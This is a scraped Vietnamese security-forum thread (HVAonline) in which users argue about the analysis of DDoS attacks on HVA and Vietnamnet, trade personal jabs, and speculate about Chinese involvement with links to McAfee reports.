- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???  
Hì hì.... ý bồ là cứ việc vẽ đường cho stl chạy nhưng đừng chửi stl, nếu không, bồ sẽ thay mặt stl để vô đây mà phản ứng? :-) . Bồ ranh nhưng chưa.... ma đủ để dùng cái vỏ che chắn cho mình đâu bồ à. Giấu đầu lòi đuôi rồi. PS: dạo này thương hiệu stl bị chửi quá nên dẹp quách nó rồi. Chuẩn bị tiếp thị nhãn hiệu khác phải không nào? :-) . Mấy bạn stl cứ nghĩ mình vẫn còn "bí ẩn" như ngày nào. Cái mặt nạ đã rớt lả tả xuống đất nên vội vàng chụp cái mặt nạ khác lên.]]>
/hvaonline/posts/list/39641.html#246660 /hvaonline/posts/list/39641.html#246660 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246663 /hvaonline/posts/list/39641.html#246663 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246668 /hvaonline/posts/list/39641.html#246668 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246669 /hvaonline/posts/list/39641.html#246669 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. - Tôi kinh doanh đồ trang sức, .. vả lại cũng không phải là người chuyên đi “nói nhăng, nói cuội” hay là “trầm cảm” như đằng ấy suy diễn đâu nha. Bị trầm cảm thì đâu có đi tụ tập, nói chuyện trên trời dưới biển với anh em, bạn bè tôi được… bị Trầm cảm thì đâu có cái cảm giác NÓNG QUÁ … như vậy được… phải không TMDTHBC ??? Tôi “phủ nhận việc làm của người khác” chỗ nào vậy bạn TMDTHBC ??? .. thế nên không dám để bạn TMDTHBC phải mất công “RE” đâu, “RCE” thì đủ rồi, trong quá trình tìm hiểu IT cũng có viết mấy code phần mềm làm việc cá nhân, nếu bạn TMDTHBC có nhã hứng thì tôi gửi cho bạn RCE để mà hiểu tôi hơn cũng được. Tôi “xin lỗi” vì bài viết này của tôi bị lạc đề, nó đang trong một luồng bài “phân tích” ??? bạn TMDTHBC hiểu không ???  @ s3ll: :D mình chỉ là 1 anh lính quèn trong quân chủng radar tên lửa trực thuộc quân khu thôi. Cũng chưa đủ trình độ RCE như các member HVA nhưng việc họ làm --> HVA và các member trong diễn đàng khiến lính quèn chúng tôi cảm mến. Về IT thì mình không rành lắm nhưng nếu bạn có nhã ý thì cứ up lên rồi mình sẽ tranh thủ thời gian để học thêm ... ( :-) mỗi ngày mình track radar đến 10 h lận, nên "RCE" chắc hơi lâu mong s3ll thông cảm nhé. Mình thì không suy diễn tí nào cả "lính mà": 'tìm-thấy-track-toạ độ-tốc độ' ---> missile "lên ngay". bạn hiểu không? Mình ủng hộ HVA làm vì tình yêu IT, vì ... "mình không cần phải nói". Giọng điệu của bạn cứ như là 1 anh chàng stl hay 1 thằng "... khựa" nào đó bực bội nên nói cho nguôi ngoai nên mình mới có ý kiến. Bạn hiểu chưa s3ll. @member HVA mình theo diễn đàn này để có thêm kiến thức & ứng dụng thêm thôi. Mong mọi người thông cảm. Còn việc đá mấy "khựa" ok mình ủng hộ hai tay hai chân, nếu cần thì ... cả đại đội mình sẽ đến. (hihi lúc này 1 ngày trực đến 10h nên oải quá)]]> /hvaonline/posts/list/39641.html#246672 /hvaonline/posts/list/39641.html#246672 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll wrote:
- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???  
Miệng bác là cái gì của người ta mà lại đi "oẹ" hộ thế. Tởm quá đê. Mà ở trên thanh minh kêu không làm, dưới lại làm ngay được, thiệt là bái phục. Btw, đúng là anh TQN có nhắc tới Anonymous và Lulzsec nhưng ý của anh TQN không phải là ảnh trên tài họ. Làm sao lại đi so sánh một cá nhân với một tập thể được nhỉ ?. Mà cậu s3ll cứ làm như tất cả mem của Anonymous đều làm cho Intel với Micro ..., ai cũng là cá nhân kiệt suất không bằng. Vài anh em ở HVA đây, một số cũng tài năng và kiến thức có lẽ cũng phải hơn trăm thằng trong Anonymous hay Lulz :))]]>
/hvaonline/posts/list/39641.html#246673 /hvaonline/posts/list/39641.html#246673 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246674 /hvaonline/posts/list/39641.html#246674 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll wrote:
- Tôi kinh doanh đồ trang sức, .. vả lại cũng không phải là người chuyên đi “nói nhăng, nói cuội” hay là “trầm cảm” như đằng ấy suy diễn đâu nha. Bị trầm cảm thì đâu có đi tụ tập, nói chuyện trên trời dưới biển với anh em, bạn bè tôi được… bị Trầm cảm thì đâu có cái cảm giác NÓNG QUÁ … như vậy được… phải không TMDTHBC ??? Tôi “phủ nhận việc làm của người khác” chỗ nào vậy bạn TMDTHBC ??? .. thế nên không dám để bạn TMDTHBC phải mất công “RE” đâu, “RCE” thì đủ rồi, trong quá trình tìm hiểu IT cũng có viết mấy code phần mềm làm việc cá nhân, nếu bạn TMDTHBC có nhã hứng thì tôi gửi cho bạn RCE để mà hiểu tôi hơn cũng được. Tôi “xin lỗi” vì bài viết này của tôi bị lạc đề, nó đang trong một luồng bài “phân tích” ??? bạn TMDTHBC hiểu không ??? 
Cái quái j đây nhỉ ?!! Sao nó viết j đọc ko hiểu !!! Tự biên tự diễn hay sao thế ta ??]]>
/hvaonline/posts/list/39641.html#246675 /hvaonline/posts/list/39641.html#246675 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll wrote:
- Tôi kinh doanh đồ trang sức, .. vả lại cũng không phải là người chuyên đi “nói nhăng, nói cuội” hay là “trầm cảm” như đằng ấy suy diễn đâu nha. Bị trầm cảm thì đâu có đi tụ tập, nói chuyện trên trời dưới biển với anh em, bạn bè tôi được… bị Trầm cảm thì đâu có cái cảm giác NÓNG QUÁ … như vậy được… phải không TMDTHBC ??? Tôi “phủ nhận việc làm của người khác” chỗ nào vậy bạn TMDTHBC ??? .. thế nên không dám để bạn TMDTHBC phải mất công “RE” đâu, “RCE” thì đủ rồi, trong quá trình tìm hiểu IT cũng có viết mấy code phần mềm làm việc cá nhân, nếu bạn TMDTHBC có nhã hứng thì tôi gửi cho bạn RCE để mà hiểu tôi hơn cũng được. Tôi “xin lỗi” vì bài viết này của tôi bị lạc đề, nó đang trong một luồng bài “phân tích” ??? bạn TMDTHBC hiểu không ??? 
Cái quái j đây nhỉ ?!! Sao nó viết j đọc ko hiểu !!! Tự biên tự diễn hay sao thế ta ??  uhm post sai bạn ơi, sorry nhé. Của bạn s3ll đó mà Be noted: Tôi đã sửa lai cho đúng. Đoạn viết trên là của s3ll, chứ không phải là của TMDTHBC. Ở bài viết kế trên đây, khi "quote" bạn GhoZt đã sơ ý.- (PXMMRF)]]>
/hvaonline/posts/list/39641.html#246679 /hvaonline/posts/list/39641.html#246679 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. càng vào nhầm chỗ rồi.) Chỉ trừ 1 chỗ bạn nói đúng (mà mọi người lại bảo bạn sai).Bạn nói không có thời gian check thì thôi để mình tìm hộ vậy. Đoạn này ở trang 6 (anh TQN có edit lại nhưng trong đoạn quote của template vẫn còn. Nên mình quote cả lên đây.

template wrote:

TQN wrote:
slt tới bây giờ chưa lòi rà một con "con mèo què" nào cho Linux, Unix. Đúng không mấy anh stl, sự thật mất lòng nhé. Tối nay em sương sương vài ba chai rồi, ngứa mồm lên chữi mấy anh chơi. Mấy anh tức không ? Làm gì được em ? À mà sao mấy anh sao không dùn 1 tool hide IP, cho 1 thằng đăng ký HVA này, lên đây, tự xưng tao là stl nè, đối chất công bằng với anh em HVA ha ? Đã fake IP rồi thì thánh cũng tìm không ra mà ! Tới bây giờ, em cũng rất muốn chat với 1 thành viên trong team mấy anh. Nick YM của em mấy anh thừa biết mà ha ! Sau này, đừng đánh giá ai thấp, nữa mùa nữa nhé, mấy anh stl ! Thật sự, khi mấy anh nói với Hà Vy Thoại là em là thằng RCE nữa mùa, em sôi gan lắm. Mấy anh nên biết là tới bây giờ, em chỉ dùng 40% công lực của em để dò theo mấy anh thôi. Chỉ cần em ngồi lỳ máy 2 tháng trời, bất chấp tất cả, em sẽ mò tới tận ổ mấy anh ! Đố mấy anh: nhiều vụ em đã hack, đã quậy tới giờ, FBI vẫn tìm không ra ! Đố mấy anh là những vụ gì ? Anonymous, Lucifer là trò trẻ con với em ! 
Nếu có nhà tài trợ nào đó cho anh TQN 2 tháng lương để cơm gạo áo tiền thì hay biết mấy nhĩ. Anh RE có nửa mùa hay không, có anh em Cviet, hva... này biết. Ở Việt Nam này cao thủ nhiều hay ko, giỏi đến mức nào thì tôi không biết. Nhưng với tôi, hiện nay anh đang là số 1 của làng CNTT VN 
Nếu anh TQN có nói thế thì mình cũng không bình luận vì ko có điều kiện để check..hic. BTW, chúc HVA luôn vững tay chèo trong cơn sóng gió. Rgrds,]]>
/hvaonline/posts/list/39641.html#246680 /hvaonline/posts/list/39641.html#246680 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246688 /hvaonline/posts/list/39641.html#246688 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:

thuypv wrote:
MÌNH DÙNG BẢN KIS 2011 BẢN QUYỀN, CHẮC LÀ KO BỊ STL ĐÂU 
chịu khó đọc lại topic này từ đầu đi bạn. KIS , AVG,.. bản quyền hay không bản quyền thực ra cũng chỉ tạo ra sự yên tâm trong tâm lý cho người sử dụng thôi.  
Ơ thế mấy thằng kia mua mất tiền mà ko ăn thua hả anh, chán nhỉ, hôm nay em vẫn ko vào được, dù là dùng iphone lướt web cũng ko vào được vietnamnet luôn Em ngại đọc lại các trang các bác đã viết lắm, dài thấy mồ, em lâu lắm mới vào HVA hình như chủ đề này có nói đến vụ mấy ông STL (sờ ti lợn :-) ) gì đó DDos HVA và vietnamnet sao đó, mấy thằng đó rảnh nhỉ, toàn các trang mình thích đọc lại đi phá hoại làm gì chứ Em vào avira download bản dùng thử 30 ngày về rùi mà quyét chả thấy con virus nào, chắc là tai thằng kasperky của em làm việc tốt quá nên hem phát hiện ra thằng ku nào sao ý à mà lạ, máy thằng em ngồi bên vẫn vào vietnamnet được, riêng máy mình thì ko, các thiết bị kèm theo người cũng ko vào được nốt, chán]]>
/hvaonline/posts/list/39641.html#246693 /hvaonline/posts/list/39641.html#246693 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Tôi cũng không ủng hộ bất cứ hành động nào của tổ chức nào tấn công HVA này... @All: Tôi cũng không hề phủ nhận công sức TQN và các thành viên giành cho việc phân tích này. Tôi thấy toàn bộ các ý kiến sau đó đều mang các ý kiến trái chiều. Các bạn đọc đi, đọc lại một hồi, rồi quy chụp cho tôi mấy cái mũ này nọ... Các bạn nói những gì tôi nói không phải sự thật, đòi bằng chứng những gì tôi nói.. Đúng ! Có lẽ tôi đã sai khi đưa lên ý kiến cá nhân trong trường hợp này tại thời điểm này. Và tôi cũng đã 3 lần xin lỗi các bạn vì điều đó. Vốn dĩ không định post thêm một bài nào tranh luận thêm... Qua đây, cũng xin cảm ơn "stylish_man" đó là bài post làm tôi cảm thấy "bức xúc" từ lâu về về cách nói chuyện hơi có vẻ kiêu ngạo của TQN... tôi cũng không biết rằng TQN đã sửa lại bài post đó của mình (Có lẽ trong phút chốc anh ta cảm thấy mình nói hơi quá ). Nếu tôi biết rằng anh ta đã sửa lại thì có lẽ tôi không post bài đấu tiên như trên... Các bạn vẫn nói tôi “nhét chữ vô miệng” , vậy đó là bằng chứng đó. Tôi dám chắc rằng, có nhiều bạn trên diễn đàn không theo dõi kĩ hết các bài viết hoặc thông tin mà chỉ là đưa ra những ý kiến "theo chiều gió" như vậy... Có bạn còn nói, STL đó là của người "Trung Quốc" - "tàu khựa" ??? Tôi nhớ không nhầm thì Admin PXMMRF đã từng có một bài viết đánh giá ý kiến này không đúng. Cá nhân tôi cũng đánh giá như vậy. Ít nhất, trên diễn đàn HVA này không có đủ bằng chứng để đưa ra kết luận đó. Vậy bạn trên nói ý tôi bênh vực cho "tàu khựa" là đúng hay không ??? Hay đó chỉ là một sự "quy kết". Tôi không muốn nói gì thêm, xin ban quản trị xoá bỏ toàn bộ các bài viết tính từ bài đầu tiên của tôi cho đến bài viết này. Tôi không muốn tranh luận thêm với các bạn về vấn đề này ở đây nữa. Cảm ơn !]]> /hvaonline/posts/list/39641.html#246696 /hvaonline/posts/list/39641.html#246696 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246697 /hvaonline/posts/list/39641.html#246697 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246698 /hvaonline/posts/list/39641.html#246698 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Hơ, tôi cũng thường xuyên xem topic này nhưng tôi chưa thấy anh TQN nói anh ấy trên tài Anonymous hay Lul gì cả. Bạn này nói "không có dẫn chứng trên đó thì có thể tôi không cho vào" Thế tôi hỏi lại là dẫn chứng đó ở đâu ? Nếu dẫn chứng đó không tìm thấy trong page này thì hãy đưa liên kết ra đây. Đừng có ở đó mà phán nhảm rồi nói như đã chứng minh được điều gì đó rồi.   Mình xác nhận là có đấy bạn. Đây là điều khiến mình thấy không hay ở TQN. Không biết là lần đó TQN có men khi post bài không nhưng thực sự TQN đã khẳng định một điều là: bạn ấy đã từng làm những việc động trời hơn Anonymous mà đến giờ FBI chưa tìm ra hay chưa phát hiện ra Mình không quan tâm TQN và STL làm gì, cái mình quan tâm là kỹ thuật và mình tôn trọng sự thật. Có thể mục đích của TQN là đúng nhưng cách thể hiện cảm xúc không hay cho lắm @TQN: mình rất thích những bài phân tích của bạn, đó là lý do mà ngày nào mình cũng vào HVA từ khi có sự kiện STL này :D @STL: nǐ mén tài hǎo :D ]]> /hvaonline/posts/list/39641.html#246699 /hvaonline/posts/list/39641.html#246699 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ?  
@TQN : Giống nhau đến mức đáng phải suy nghĩ a. Nếu e nhớ không nhầm thì a PXMMRF đã từng nói nghi ngờ một tổ chức hacker nào đó( có lẽ là tổ chức có mạng lưới ở toàn cầu) là chủ nhân của những con Botnet này. ]]>
/hvaonline/posts/list/39641.html#246702 /hvaonline/posts/list/39641.html#246702 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246705 /hvaonline/posts/list/39641.html#246705 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Mình chỉ nói chính kiến. hihi sorry tất cả các member có thiện ý trong diễn đàn khi mình quá non trẻ. "thằng khựa nào không thích" nói thẳng mình, mình sẽ "lạy cho chết mẹ cả dòng họ phản quốc nó luôn". =)) PS: mình đang tìm mấy thằng đó ... member nào biết chỉ dùm. THANKU]]> /hvaonline/posts/list/39641.html#246707 /hvaonline/posts/list/39641.html#246707 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:

TQN wrote:
Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ?  
@TQN : Giống nhau đến mức đáng phải suy nghĩ a. Nếu e nhớ không nhầm thì a PXMMRF đã từng nói nghi ngờ một tổ chức hacker nào đó( có lẽ là tổ chức có mạng lưới ở toàn cầu) là chủ nhân của những con Botnet này.  
Hàn quốc này cũng xung đột với triều tiên, chế độ cộng sản giống TQ. chắc cũng có liên quan thật :-S ]]>
/hvaonline/posts/list/39641.html#246710 /hvaonline/posts/list/39641.html#246710 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong wrote:

mylove14129 wrote:

TQN wrote:
Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ?  
@TQN : Giống nhau đến mức đáng phải suy nghĩ a. Nếu e nhớ không nhầm thì a PXMMRF đã từng nói nghi ngờ một tổ chức hacker nào đó( có lẽ là tổ chức có mạng lưới ở toàn cầu) là chủ nhân của những con Botnet này.  
Hàn quốc này cũng xung đột với triều tiên, chế độ cộng sản giống TQ. chắc cũng có liên quan thật :-S  
@ALL : nếu quả thật cuối cùng bọn STL này có liên quan ít nhiều đến Trung Quốc thì : anh PXMMRF < nhất định có được thông tin ngầm này ở một nơi nào đó. Hoặc vì lý do gì đó anh PXMMRF biết nhưng không thể, hoặc không tiện hoặc không dám nói thẳng ra ở HVA . vì tôi theo rõi các bước forensic của anh PXMMRF từ những phần đầu và thấy rằng anh PXMMRF luôn có "ý" về liên quan tới bọn tàu; chứ chỉ dựa vào các cách track back theo kỹ thuật đơn thuần thì quả thật rất khó có thể nói được có tầu tây gì tham gia hay không vào đám STL này; Thêm nữa yếu tố chính trị và Vietnamnet có liên quan gì đây ? Tôi đã từng hồ đồ mà suy diễn rằng "không có sự liên quan của Tàu khựa" nhưng giờ mới thấy mình ngây thơ. Quả thật chung kết, chung thời vận sắp đến rồi. Lòng người đen tối hơn . :| ]]>
/hvaonline/posts/list/39641.html#246716 /hvaonline/posts/list/39641.html#246716 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ? Chuyện tranh luận với bạn s3ll (sell), tôi không quan tâm. 10 người 11 ý. Không ai cấm ai suy nghĩ, phát biểu theo ý này ý kia được. Tôi cũng như bạn s3ll, lúc chiều đó uống sương sương mấy chai, tối lên mạng chửi bậy vài câu. Sáng ra tỉnh thì edit lại ngay. Tửu nhập ngôn xuất mà, phải không anh em :P  
Theo anh, không loại bỏ khả năng stl sử dụng code và kỹ thuật của đám đã từng "phun mưa" ở Nam Hàn. Mô hình tương tự nhau, tiến trình cũng tương tự nhau, payload cũng được encrypt trên server side và decrypt ở client side, HTTP headers cũng mang tính chất random....]]>
/hvaonline/posts/list/39641.html#246717 /hvaonline/posts/list/39641.html#246717 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246763 /hvaonline/posts/list/39641.html#246763 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman wrote:
................................ @ALL : nếu quả thật cuối cùng bọn STL này có liên quan ít nhiều đến Trung Quốc thì : anh PXMMRF < nhất định có được thông tin ngầm này ở một nơi nào đó. Hoặc vì lý do gì đó anh PXMMRF biết nhưng không thể, hoặc không tiện hoặc không dám nói thẳng ra ở HVA . vì tôi theo rõi các bước forensic của anh PXMMRF từ những phần đầu và thấy rằng anh PXMMRF luôn có "ý" về liên quan tới bọn tàu; chứ chỉ dựa vào các cách track back theo kỹ thuật đơn thuần thì quả thật rất khó có thể nói được có tầu tây gì tham gia hay không vào đám STL này; Thêm nữa yếu tố chính trị và Vietnamnet có liên quan gì đây ? Tôi đã từng hồ đồ mà suy diễn rằng "không có sự liên quan của Tàu khựa" nhưng giờ mới thấy mình ngây thơ. Quả thật chung kết, chung thời vận sắp đến rồi. Lòng người đen tối hơn . :|  
Vâng! Điều bạn đoán chắc là có. Nhưng đấy cũng chỉ là những xác minh lai sau này, để biết thật chắc chắn suy nghĩ của mình (của tôi) là đúng, hay ít nhất là có cơ sở thực tế, mà thôi. Chúng không phải là những thông tin mà tôi biết ngay từ đầu. Khi xét đoán, nhận định một sự kiện, cũng như danh tính, đông cơ (motivation) của những người can dự vào sự kiện ấy, phải đặt sự kiện vào bối cảnh, hoàn cảnh (situation) xã hôi, đất nước, thế giới cụ thể và đương thời của nó. Nếu không như vậy, thì rất khó xét đoán, nhận định sự kiện một cách đúng đắn hoặc sẽ có những suy nghĩ quá đơn giản, chỉ chuyên môn (kỹ thuật) đơn thuần, hay bị lệch hướng. Chúng ta cũng nên lưu ý, bối cảnh ở đây không chỉ liên quan đến chính trị. Những cuộc điều tra của McAfee về làn sóng tấn công DDoS vào nhiều website của Mỹ, Đại hàn và một vài nước khác thời gian gần đây, đã đươc công bố tại các địa chỉ sau: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems và đăc biệt là: http://blogs.mcafee.com/mcafee-labs/revealed-operation-shady-rat cũng là một phần quan trọng vẽ lên bối cảnh, hoàn cảnh nói trên một cách toàn diện. Không chỉ McAfee, các công ty bảo mật trên mạng khác, cũng có một số báo cáo điều tra với nội dung tương tự. Trong một sự kiện xảy ra có nhiều hiện tượng. Nếu xét riêng từng hiện tượng, tách rời nó với các hiện tượng khác, chúng ta sẽ khó xác định hay tìm ra những mối liên quan với danh tính hay động cơ của những người can dự vào sự kiện. Nghĩa là chúng ta khó coi nó là một bằng chứng (evidence) tin cậy. Nhưng nếu chúng ta gôp chung chúng, tổng hơp chúng với nhau và đặt chúng trong một bối cảnh, hoàn cảnh cụ thể thì lai thấy những bằng chứng rất đáng tin cậy. Những hiện tượng riêng rẽ nói trên ta có thể tìm thấy không ít trong các bài viết của anh TQN, của tôi, của các bạn khác và ngay cả trong các bài viết của anh conmale, trong chủ đề này. Không chỉ vậy, việc xác định danh tính, động cơ của những người can dự vào sự kiện có nhiều trường hợp đòi hỏi phải theo dõi trong một thời gian đủ dài. Thí dụ tôi theo dõi sư kiện mà ta đang bàn trong chủ đề (topic) này, từ lúc PA Việt nam bị chiếm đoạt tên miền pavietnam.net, pavietnam.com, nghĩa là đã khá lâu, như tôi đã từng viết. Nhất thời rất khó xác định. Cũng cần nói thêm là việc quan sát và biết về một bối cảnh, hoàn cảnh không đồng nghĩa với việc đã nhận thức nó một cách đúng đắn và sâu sắc. Thí dụ chúng ta biết về sự kiện TQ đã hoàn tất một dàn khoan lớn trị giá tới gần 1 tỷ USD, có thể hoạt động ở các vùng biển sâu tới 11.000m và khoan thăm dò tai vùng đáy biển sâu tới 3.000m, thì ta dễ choáng ngợp với tiềm năng kinh tế- kỹ thuật của TQ. Và có khi ta chỉ dừng suy nghĩ của mình tai điểm này. Nhưng nếu chúng ta tiếp tục suy nghĩ thì sẽ có nhiều câu hỏi được đặt ra cho chính mình. Chúng ta tư hỏi TQ đã mất bao nhiêu năm để làm xong cái dàn khoan thăm dò dầu khí khổng lồ này?. Thời gian thiết kế và chế tao chắc chỉ khoảng trên dưới 3 năm. Nhưng như vậy cũng là khá dài. Tuy nhiên ở các nước theo hệ thống quản lý XHCN thì thủ tục trình duyệt một dự án lớn như vậy vốn tốn rất nhiều thời gian. Từ khi các cấp lãnh đạo đưa ra ý tưởng ban đầu, rồi đến bước thiết lập dự án kinh tế-kỹ thuật khả thi, rồi trình các cấp lãnh đạo từ thấp đến cao nhất thông qua, góp ý, sửa đi sửa lai ... tốn ít nhất từ 3 đến 5 năm. Như vậy ta phải thấy TQ đã bắt đầu các bước chuẩn bị và tiến hành chế tao dàn khoan từ rất lâu rồi. Không phải chỉ thời gian mới đây. Câu hỏi tiếp theo là TQ sẽ đặt dàn khoan khủng ấy ở đâu trên biển Đông? Câu trả lời của những chuyên gia dầu khí am hiểu là: Nó cần phải đặt ở khu vực quần đảo Trường sa, gần khu vưc bãi Gac ma mà TQ đã chiếm của VN năm 1988. Khu vưc này là "rốn dầu" của biển Đông, có trữ lượng dầu khoảng trên dưới 200 tỷ barrel dầu thô, kèm theo một khối lượng khí khổng lồ, cỡ nhất nhì thế giới. Nền kinh tế phát triển nhanh và rất nóng của TQ tiêu thu một khối năng lương khổng lồ, trong đó chủ yếu là dầu. Hiện TQ chỉ có khả năng tự sản xuất và cung cấp khoảng 3 đến 4% nhu cầu dầu. Nếu nền công nghiệp của họ thiếu dầu cung cấp hay việc cung cấp bị gián đoạn thì nền kinh tế của TQ sẽ sụp đổ nhanh chóng kiểu "lá bài domino", chế độ và quyền lực của các cấp lãnh đạo cao nhất cũng sụp đổ theo. Vừa qua TQ đầu tư một khoản tín dụng khổng lồ vào các nước châu Phi, châu Mỹ Latinh để đổi lai các quyền lơi kinh tế, trong đó có việc đươc cung cấp dầu, nguyên liêu thô.. một cách ổn định. Tuy nhiên sự sụp đổ gần đây của chính quyền các nước châu Phi như Ai câp, Lybia... đã gây không ít khó khăn và tổn thất cho TQ. Sư cung cấp dầu đươc kỳ vọng là đầy đủ và liên tục từ các nước này trở thành sự thất vọng năng nề. Từ bối cảnh trên chúng ta hiểu rõ tai sao vừa qua TQ lai kiên quyết không đàm phán với VN về chủ quyền Hoang sa (thông tin công khai trên các báo TQ), kiên định lập trường về đường "lưỡi bò" chiếm hơn 80% diện tích biển Đông là "chủ quyền không thể bàn cãi" của TQ là lợi ích "cốt lõi" của quốc gia này. Câu hỏi tiếp theo nữa là dàn khoan khủng sẽ đươc đưa ra vị trí dự định và đứng một mình à? Không phải, nó phải đi kèm theo từ 3 đến 4 tầu lai, dắt. Xung quanh nó phải có các tầu tiếp tế, các chiến hạm, tầu ngầm bảo vệ nữa. Thế là một vương quốc nhỏ thuộc chủ quyền TQ sẽ được đặt tai khu vực quần đảo Trường sa. Câu hỏi cuối cùng, chắc không phải là cuối cùng đâu, là dàn khoan sẽ liên lạc thường xuyên với đất liền, với các chiến hạm bằng cách nào? Vị trí dự kiến đặt dàn khoan cách VN khoảng 400 km, cách luc đia TQ, điểm gần nhất, là xa gấp 3 lần, khoảng 1000-1200km. Với khoảng cách này không thể kéo cáp quang từ đất liền ra dàn khoan được. Như vậy việc liên hệ phải thông qua vệ tinh (satellite communication). Vậy thì TQ chống hack qua con đường vệ tinh thế nào nhỉ? TQ hiện có bao nhiêu vệ tinh và có vệ tinh địa tĩnh nào của TQ đặt ngay trên biển Đông không nhỉ? Cứ thế ta sẽ có hàng loạt câu hỏi về một sự kiên. Đặt ra và tìm cách trả lời chúng, ta có có thể nhận thức sâu sắc, chính xác về sự kiện. ]]>
/hvaonline/posts/list/39641.html#246798 /hvaonline/posts/list/39641.html#246798 GMT
